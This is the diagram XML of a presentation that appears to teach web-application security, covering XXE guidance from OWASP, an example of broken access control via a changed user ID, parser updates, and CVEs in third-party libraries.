      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US"/>
            <a:t>OWASP Guidance on XXE Processing</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{2DDE7A5E-8882-4C3F-818B-BA288919EBC5}" type="parTrans" cxnId="{E341CFB0-C1B4-4ADD-A9D0-4FA2101FCD7F}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{E0182513-7342-40AF-AB86-E5A7C8A4D12E}" type="sibTrans" cxnId="{E341CFB0-C1B4-4ADD-A9D0-4FA2101FCD7F}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{72F96E5A-118D-430F-A8FF-E8D14A961F3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https://owasp.org/www-community/vulnerabilities/XML_External_Entity_(XXE)_Processing</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" dirty="0">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
          </a:endParaRPr>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{104683B6-A2D2-4437-BA80-571B85C892B4}" type="parTrans" cxnId="{739BACE0-9B66-4E78-80AB-DC27B6FF71DC}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{1BE717B2-8B81-4FEF-A71A-F64A1B428289}" type="sibTrans" cxnId="{739BACE0-9B66-4E78-80AB-DC27B6FF71DC}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{BF390ABB-A757-4458-B45E-897741766ECA}" type="pres">
      <dgm:prSet presAssocID="{83E97923-AE2A-477E-A0E7-B8C0BCFF1AAB}" presName="linear" presStyleCnt="0">
        <dgm:presLayoutVars>
          <dgm:animLvl val="lvl"/>
          <dgm:resizeHandles val="exact"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{2BAFD9A0-9356-4A0F-910E-1292F34FFCA6}" type="pres">
      <dgm:prSet presAssocID="{B22F64C8-D8A7-4833-AA1C-6D9B36ED45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6F514B-AF0B-4596-8C8A-B70793CCFB60}" type="pres">
      <dgm:prSet presAssocID="{981523EC-31CF-4A2A-8911-238B2CE76698}" presName="spacer" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{A85FA0C0-1AE1-459E-BB3C-AF0E6266F33A}" type="pres">
      <dgm:prSet presAssocID="{10EF2366-E7E4-4A4C-B998-0C53716C502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C5E1D4-E8CE-4394-B79F-9894141D9D20}" type="pres">
      <dgm:prSet presAssocID="{78CFE787-595B-4840-8390-55BA473716F1}" presName="spacer" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{A12721C7-07EE-4E2D-A0D3-423C916EF978}" type="pres">
      <dgm:prSet presAssocID="{B3883286-5E74-4894-A938-9FD29C1287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A176CE-80A1-459A-AFD5-3D7168EFE6D1}" type="pres">
      <dgm:prSet presAssocID="{E0182513-7342-40AF-AB86-E5A7C8A4D12E}" presName="spacer" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{8C18EE1D-9E2D-4840-BB8A-22EBE02CCB83}" type="pres">
      <dgm:prSet presAssocID="{72F96E5A-118D-430F-A8FF-E8D14A961F3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87DB15-4075-4C8F-BFEF-B7CE1BB04811}" type="presOf" srcId="{B3883286-5E74-4894-A938-9FD29C1287AE}" destId="{A12721C7-07EE-4E2D-A0D3-423C916EF978}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList2"/>
    <dgm:cxn modelId="{6CE1E31C-CB26-4931-9C26-3F001399C29D}" type="presOf" srcId="{10EF2366-E7E4-4A4C-B998-0C53716C502A}" destId="{A85FA0C0-1AE1-459E-BB3C-AF0E6266F33A}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList2"/>
    <dgm:cxn modelId="{E2365D32-856D-4ECF-BC43-CB7DD4871296}" type="presOf" srcId="{B22F64C8-D8A7-4833-AA1C-6D9B36ED4543}" destId="{2BAFD9A0-9356-4A0F-910E-1292F34FFCA6}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList2"/>
    <dgm:cxn modelId="{EF5A7550-7411-498B-B723-542C9F4A14E5}" srcId="{83E97923-AE2A-477E-A0E7-B8C0BCFF1AAB}" destId="{10EF2366-E7E4-4A4C-B998-0C53716C502A}" srcOrd="1" destOrd="0" parTransId="{0E9A0BA3-F140-490D-A817-DB31ECCA2FC8}" sibTransId="{78CFE787-595B-4840-8390-55BA473716F1}"/>
    <dgm:cxn modelId="{C9686471-ACB6-4C53-8827-3028AFC5959D}" type="presOf" srcId="{72F96E5A-118D-430F-A8FF-E8D14A961F3A}" destId="{8C18EE1D-9E2D-4840-BB8A-22EBE02CCB83}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList2"/>
    <dgm:cxn modelId="{9424CB95-74BC-4849-9B2B-62BDFEF6A06B}" srcId="{83E97923-AE2A-477E-A0E7-B8C0BCFF1AAB}" destId="{B22F64C8-D8A7-4833-AA1C-6D9B36ED4543}" srcOrd="0" destOrd="0" parTransId="{935A379D-15D4-477B-8A0B-E168321DE572}" sibTransId="{981523EC-31CF-4A2A-8911-238B2CE76698}"/>
    <dgm:cxn modelId="{E341CFB0-C1B4-4ADD-A9D0-4FA2101FCD7F}" srcId="{83E97923-AE2A-477E-A0E7-B8C0BCFF1AAB}" destId="{B3883286-5E74-4894-A938-9FD29C1287AE}" srcOrd="2" destOrd="0" parTransId="{2DDE7A5E-8882-4C3F-818B-BA288919EBC5}" sibTransId="{E0182513-7342-40AF-AB86-E5A7C8A4D12E}"/>
    <dgm:cxn modelId="{A41E66D2-50EC-4E49-8114-AF16FC17FC27}" type="presOf" srcId="{83E97923-AE2A-477E-A0E7-B8C0BCFF1AAB}" destId="{BF390ABB-A757-4458-B45E-897741766ECA}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList2"/>
    <dgm:cxn modelId="{739BACE0-9B66-4E78-80AB-DC27B6FF71DC}" srcId="{83E97923-AE2A-477E-A0E7-B8C0BCFF1AAB}" destId="{72F96E5A-118D-430F-A8FF-E8D14A961F3A}" srcOrd="3" destOrd="0" parTransId="{104683B6-A2D2-4437-BA80-571B85C892B4}" sibTransId="{1BE717B2-8B81-4FEF-A71A-F64A1B428289}"/>
    <dgm:cxn modelId="{2381EC73-8405-4D7D-A653-695D9003B824}" type="presParOf" srcId="{BF390ABB-A757-4458-B45E-897741766ECA}" destId="{2BAFD9A0-9356-4A0F-910E-1292F34FFCA6}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList2"/>
    <dgm:cxn modelId="{652978EE-3E6B-4398-A63D-C5933A7FA1E6}" type="presParOf" srcId="{BF390ABB-A757-4458-B45E-897741766ECA}" destId="{3D6F514B-AF0B-4596-8C8A-B70793CCFB60}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList2"/>
    <dgm:cxn modelId="{4BD87373-1D5E-4B22-B341-4A75332548E5}" type="presParOf" srcId="{BF390ABB-A757-4458-B45E-897741766ECA}" destId="{A85FA0C0-1AE1-459E-BB3C-AF0E6266F33A}" srcOrd="2" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList2"/>
    <dgm:cxn modelId="{C7AF4526-E1AC-4F64-80BE-B421A0036EE1}" type="presParOf" srcId="{BF390ABB-A757-4458-B45E-897741766ECA}" destId="{31C5E1D4-E8CE-4394-B79F-9894141D9D20}" srcOrd="3" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList2"/>
    <dgm:cxn modelId="{3FEE252F-F585-4CEF-97EE-20A827A95052}" type="presParOf" srcId="{BF390ABB-A757-4458-B45E-897741766ECA}" destId="{A12721C7-07EE-4E2D-A0D3-423C916EF978}" srcOrd="4" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList2"/>
    <dgm:cxn modelId="{160342D4-594A-4303-8BE0-483CCBE3B8BE}" type="presParOf" srcId="{BF390ABB-A757-4458-B45E-897741766ECA}" destId="{23A176CE-80A1-459A-AFD5-3D7168EFE6D1}" srcOrd="5" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList2"/>
    <dgm:cxn modelId="{A056A5F6-724A-489F-920C-A2AC05264899}" type="presParOf" srcId="{BF390ABB-A757-4458-B45E-897741766ECA}" destId="{8C18EE1D-9E2D-4840-BB8A-22EBE02CCB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741856-A9E8-43DE-A95B-3C8179DF96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1FBF24-BEC4-4C3C-A3C1-EC7D1929EC29}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" dirty="0"/>
            <a:t>If I have a web application that shows a user their profile like this: </a:t>
          </a:r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https://exampleapp.cryptojones.dev/userinfo/51</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" dirty="0">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
          </a:endParaRPr>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{376823FE-203E-4E07-9C7D-155021AC82F7}" type="parTrans" cxnId="{CAE41387-2673-4B51-A6E3-E69DC4E97F60}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{46755F6C-0BD2-4254-9BA3-8F6140C8B8BA}" type="sibTrans" cxnId="{CAE41387-2673-4B51-A6E3-E69DC4E97F60}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{6037E343-F868-4663-8144-E6287A24B7E0}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" dirty="0"/>
            <a:t>and If the user change the number from 51 to 50 and see another user's information, that is broken access control!</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{6470F8F8-420D-4F87-91C3-3224F54D6EE0}" type="parTrans" cxnId="{E2522A21-5D41-4032-9EC1-1D70F1826AAD}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{7A0B913C-207E-4068-991B-D0681F302B4C}" type="sibTrans" cxnId="{E2522A21-5D41-4032-9EC1-1D70F1826AAD}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{DC54FC1D-9590-43D2-A1F9-AD6BA6188918}" type="pres">
      <dgm:prSet presAssocID="{3C741856-A9E8-43DE-A95B-3C8179DF964B}" presName="linear" presStyleCnt="0">
        <dgm:presLayoutVars>
          <dgm:animLvl val="lvl"/>
          <dgm:resizeHandles val="exact"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{20079865-6FE2-4DD2-AA70-A93D05E87AA2}" type="pres">
      <dgm:prSet presAssocID="{091FBF24-BEC4-4C3C-A3C1-EC7D1929EC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FFD886-7E7D-4FD5-8E24-640EC05ED232}" type="pres">
      <dgm:prSet presAssocID="{46755F6C-0BD2-4254-9BA3-8F6140C8B8BA}" presName="spacer" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{BB47FA27-2962-482A-8343-094F2F5273E8}" type="pres">
      <dgm:prSet presAssocID="{6037E343-F868-4663-8144-E6287A24B7E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2522A21-5D41-4032-9EC1-1D70F1826AAD}" srcId="{3C741856-A9E8-43DE-A95B-3C8179DF964B}" destId="{6037E343-F868-4663-8144-E6287A24B7E0}" srcOrd="1" destOrd="0" parTransId="{6470F8F8-420D-4F87-91C3-3224F54D6EE0}" sibTransId="{7A0B913C-207E-4068-991B-D0681F302B4C}"/>
    <dgm:cxn modelId="{3ABC0637-43CE-4676-8F40-15703D2018E8}" type="presOf" srcId="{3C741856-A9E8-43DE-A95B-3C8179DF964B}" destId="{DC54FC1D-9590-43D2-A1F9-AD6BA6188918}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList2"/>
    <dgm:cxn modelId="{D4E6D26A-0ACD-45CB-BB71-BCC06A10E020}" type="presOf" srcId="{6037E343-F868-4663-8144-E6287A24B7E0}" destId="{BB47FA27-2962-482A-8343-094F2F5273E8}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList2"/>
    <dgm:cxn modelId="{CAE41387-2673-4B51-A6E3-E69DC4E97F60}" srcId="{3C741856-A9E8-43DE-A95B-3C8179DF964B}" destId="{091FBF24-BEC4-4C3C-A3C1-EC7D1929EC29}" srcOrd="0" destOrd="0" parTransId="{376823FE-203E-4E07-9C7D-155021AC82F7}" sibTransId="{46755F6C-0BD2-4254-9BA3-8F6140C8B8BA}"/>
    <dgm:cxn modelId="{E9CADAB1-7C82-4A35-BCED-BE6CBFDCF3FC}" type="presOf" srcId="{091FBF24-BEC4-4C3C-A3C1-EC7D1929EC29}" destId="{20079865-6FE2-4DD2-AA70-A93D05E87AA2}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList2"/>
    <dgm:cxn modelId="{2333D5F1-9784-4101-9235-FA127F809CE8}" type="presParOf" srcId="{DC54FC1D-9590-43D2-A1F9-AD6BA6188918}" destId="{20079865-6FE2-4DD2-AA70-A93D05E87AA2}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList2"/>
    <dgm:cxn modelId="{2708F40E-EBFC-4873-802D-A01AEA056DF0}" type="presParOf" srcId="{DC54FC1D-9590-43D2-A1F9-AD6BA6188918}" destId="{74FFD886-7E7D-4FD5-8E24-640EC05ED232}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList2"/>
    <dgm:cxn modelId="{24EC04E5-A208-479C-8D5E-66F47A1D7802}" type="presParOf" srcId="{DC54FC1D-9590-43D2-A1F9-AD6BA6188918}" destId="{BB47FA27-2962-482A-8343-094F2F5273E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A7AE0B-BD83-4E5A-8920-51144D0ABF5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DC11AC-D7B1-4FAF-B952-A8C5BB292F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XML or JSON</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{63437A0E-8F2C-408F-980E-9065635B3472}" type="parTrans" cxnId="{7CC81C55-5ADE-4A7C-92FF-612A3FBCDE23}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{D63E56AA-48BD-438F-8C8F-E724C722A4C2}" type="sibTrans" cxnId="{7CC81C55-5ADE-4A7C-92FF-612A3FBCDE23}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{24381D9C-30CC-4709-8196-81B9873CD9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parsers up to date</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{0DB02412-A53D-4CE2-9960-ABFF6C4E4BD9}" type="parTrans" cxnId="{326C621F-7D18-44F1-B621-01BF70900662}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{8CC24871-8CC6-4DBF-A201-050A3A4DBEFC}" type="sibTrans" cxnId="{326C621F-7D18-44F1-B621-01BF70900662}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{3716C68C-633B-489B-B74B-18BE2AF439F9}" type="pres">
      <dgm:prSet presAssocID="{2FA7AE0B-BD83-4E5A-8920-51144D0ABF55}" presName="root" presStyleCnt="0">
        <dgm:presLayoutVars>
          <dgm:dir/>
          <dgm:resizeHandles val="exact"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{D1073763-B01B-4551-A770-E38A892630FA}" type="pres">
      <dgm:prSet presAssocID="{3CDC11AC-D7B1-4FAF-B952-A8C5BB292F4E}" presName="compNode" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{041C0366-5D4D-4730-8D63-CFAF3B5B0E43}" type="pres">
      <dgm:prSet presAssocID="{3CDC11AC-D7B1-4FAF-B952-A8C5BB292F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767AF16-CCEA-45EB-862D-C90B97686DBE}" type="pres">
      <dgm:prSet presAssocID="{3CDC11AC-D7B1-4FAF-B952-A8C5BB292F4E}" presName="spaceRect" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{94A239E3-6134-490C-B32D-214F642885D4}" type="pres">
      <dgm:prSet presAssocID="{3CDC11AC-D7B1-4FAF-B952-A8C5BB292F4E}" presName="textRect" presStyleLbl="revTx" presStyleIdx="0" presStyleCnt="2">
        <dgm:presLayoutVars>
          <dgm:chMax val="1"/>
          <dgm:chPref val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{A18CABA3-B438-4D2B-B2EF-7899692C4119}" type="pres">
      <dgm:prSet presAssocID="{D63E56AA-48BD-438F-8C8F-E724C722A4C2}" presName="sibTrans" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{4684B070-F2BB-4C66-854D-5F134FDCBCA0}" type="pres">
      <dgm:prSet presAssocID="{24381D9C-30CC-4709-8196-81B9873CD9A6}" presName="compNode" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{B80AB3B4-2986-4418-89B7-1A141B2582C3}" type="pres">
      <dgm:prSet presAssocID="{24381D9C-30CC-4709-8196-81B9873CD9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1E987BA0-9B33-44A2-A5B6-3B3150FAC99D}" type="pres">
      <dgm:prSet presAssocID="{24381D9C-30CC-4709-8196-81B9873CD9A6}" presName="spaceRect" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{1AF5433A-17DF-44EC-8F63-D967BDA7F068}" type="pres">
      <dgm:prSet presAssocID="{24381D9C-30CC-4709-8196-81B9873CD9A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26C621F-7D18-44F1-B621-01BF70900662}" srcId="{2FA7AE0B-BD83-4E5A-8920-51144D0ABF55}" destId="{24381D9C-30CC-4709-8196-81B9873CD9A6}" srcOrd="1" destOrd="0" parTransId="{0DB02412-A53D-4CE2-9960-ABFF6C4E4BD9}" sibTransId="{8CC24871-8CC6-4DBF-A201-050A3A4DBEFC}"/>
    <dgm:cxn modelId="{3C096644-B023-4D33-82E9-E0C58FDA2FEC}" type="presOf" srcId="{24381D9C-30CC-4709-8196-81B9873CD9A6}" destId="{1AF5433A-17DF-44EC-8F63-D967BDA7F068}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/2/layout/IconLabelList"/>
    <dgm:cxn modelId="{7CC81C55-5ADE-4A7C-92FF-612A3FBCDE23}" srcId="{2FA7AE0B-BD83-4E5A-8920-51144D0ABF55}" destId="{3CDC11AC-D7B1-4FAF-B952-A8C5BB292F4E}" srcOrd="0" destOrd="0" parTransId="{63437A0E-8F2C-408F-980E-9065635B3472}" sibTransId="{D63E56AA-48BD-438F-8C8F-E724C722A4C2}"/>
    <dgm:cxn modelId="{BCF321CD-FB96-41EE-98EF-C0426653BEB6}" type="presOf" srcId="{3CDC11AC-D7B1-4FAF-B952-A8C5BB292F4E}" destId="{94A239E3-6134-490C-B32D-214F642885D4}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/2/layout/IconLabelList"/>
    <dgm:cxn modelId="{FFF707D9-9D1F-44CD-A5DC-BD81C833EBEF}" type="presOf" srcId="{2FA7AE0B-BD83-4E5A-8920-51144D0ABF55}" destId="{3716C68C-633B-489B-B74B-18BE2AF439F9}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/2/layout/IconLabelList"/>
    <dgm:cxn modelId="{67137085-13C4-4AC2-9904-1E75C3000DA2}" type="presParOf" srcId="{3716C68C-633B-489B-B74B-18BE2AF439F9}" destId="{D1073763-B01B-4551-A770-E38A892630FA}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/2/layout/IconLabelList"/>
    <dgm:cxn modelId="{367CD4FC-0662-48EE-A5A6-CCAF84AE9137}" type="presParOf" srcId="{D1073763-B01B-4551-A770-E38A892630FA}" destId="{041C0366-5D4D-4730-8D63-CFAF3B5B0E43}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/2/layout/IconLabelList"/>
    <dgm:cxn modelId="{8F980F4E-5395-4ABF-A07A-8C5E43238695}" type="presParOf" srcId="{D1073763-B01B-4551-A770-E38A892630FA}" destId="{4767AF16-CCEA-45EB-862D-C90B97686DBE}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/2/layout/IconLabelList"/>
    <dgm:cxn modelId="{DE6AF675-AE55-40D0-85BE-5F689A7111EE}" type="presParOf" srcId="{D1073763-B01B-4551-A770-E38A892630FA}" destId="{94A239E3-6134-490C-B32D-214F642885D4}" srcOrd="2" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/2/layout/IconLabelList"/>
    <dgm:cxn modelId="{73236CF5-5083-4978-B4C1-44FE598103BB}" type="presParOf" srcId="{3716C68C-633B-489B-B74B-18BE2AF439F9}" destId="{A18CABA3-B438-4D2B-B2EF-7899692C4119}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/2/layout/IconLabelList"/>
    <dgm:cxn modelId="{B944624B-9CB4-4DB7-9463-797E66822A0E}" type="presParOf" srcId="{3716C68C-633B-489B-B74B-18BE2AF439F9}" destId="{4684B070-F2BB-4C66-854D-5F134FDCBCA0}" srcOrd="2" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/2/layout/IconLabelList"/>
    <dgm:cxn modelId="{983D640F-B0BD-4523-A996-8C09B514A71F}" type="presParOf" srcId="{4684B070-F2BB-4C66-854D-5F134FDCBCA0}" destId="{B80AB3B4-2986-4418-89B7-1A141B2582C3}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/2/layout/IconLabelList"/>
    <dgm:cxn modelId="{BC1CE718-1D7F-43C7-8CCC-217C16BDAB1B}" type="presParOf" srcId="{4684B070-F2BB-4C66-854D-5F134FDCBCA0}" destId="{1E987BA0-9B33-44A2-A5B6-3B3150FAC99D}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/2/layout/IconLabelList"/>
    <dgm:cxn modelId="{E58775B2-A6E1-430C-84F4-C3540C074796}" type="presParOf" srcId="{4684B070-F2BB-4C66-854D-5F134FDCBCA0}" destId="{1AF5433A-17DF-44EC-8F63-D967BDA7F0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6FF4A6-B83E-442E-B47F-2C09749D9F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A1AF4C-35E9-4DF8-A8CC-9157FFBD3938}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US"/>
            <a:t>3</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" baseline="30000"/>
            <a:t>rd</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US"/>
            <a:t> Party Libraries are Always Secure, right?</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{7EDEB407-10A5-4D47-8615-C553B8791C47}" type="parTrans" cxnId="{B9AAC5E1-139B-4B48-9601-75B8CC22DF39}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{08F43F0A-6029-4BCA-A096-FCF6ADCF1C33}" type="sibTrans" cxnId="{B9AAC5E1-139B-4B48-9601-75B8CC22DF39}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{10CE7486-F473-4A7B-B6D4-923C3600B20D}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US"/>
            <a:t>CVE-2016-5000 Apache POI Information Disclosure</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{507E1178-6A4C-4063-8AEB-AC5A55B60955}" type="parTrans" cxnId="{6C82D01C-ED69-43CD-BEC9-BC42E78784DE}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{C48908B1-C198-422E-B09E-19008122F5C3}" type="sibTrans" cxnId="{6C82D01C-ED69-43CD-BEC9-BC42E78784DE}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{2CB44DEB-D2D1-4985-AE12-2BA7A2252E34}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US"/>
            <a:t>CVE-2016-4216 Adobe XMP Toolkit for Java Information Disclosure</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{9C4D396D-E2F1-4B07-B16A-12E55C5EF21F}" type="parTrans" cxnId="{F3BACBBE-08DF-492F-B9A4-F7BE7AA596DA}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{BF75C58D-1579-4571-A6EB-D5A3105B07B9}" type="sibTrans" cxnId="{F3BACBBE-08DF-492F-B9A4-F7BE7AA596DA}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{A13F4ED5-ADB8-4A2A-83B8-F87DA47961C6}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US"/>
            <a:t>CVE-2016-3081 Remote Code Execution vuln in Apache Struts</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{4A7838C0-36BA-410C-A506-82E26B1894BF}" type="parTrans" cxnId="{B1B8D3C3-8D12-46EB-B09B-4D17697FBDB9}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{50F1D0BE-E58F-405E-9783-3A232ACDC388}" type="sibTrans" cxnId="{B1B8D3C3-8D12-46EB-B09B-4D17697FBDB9}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
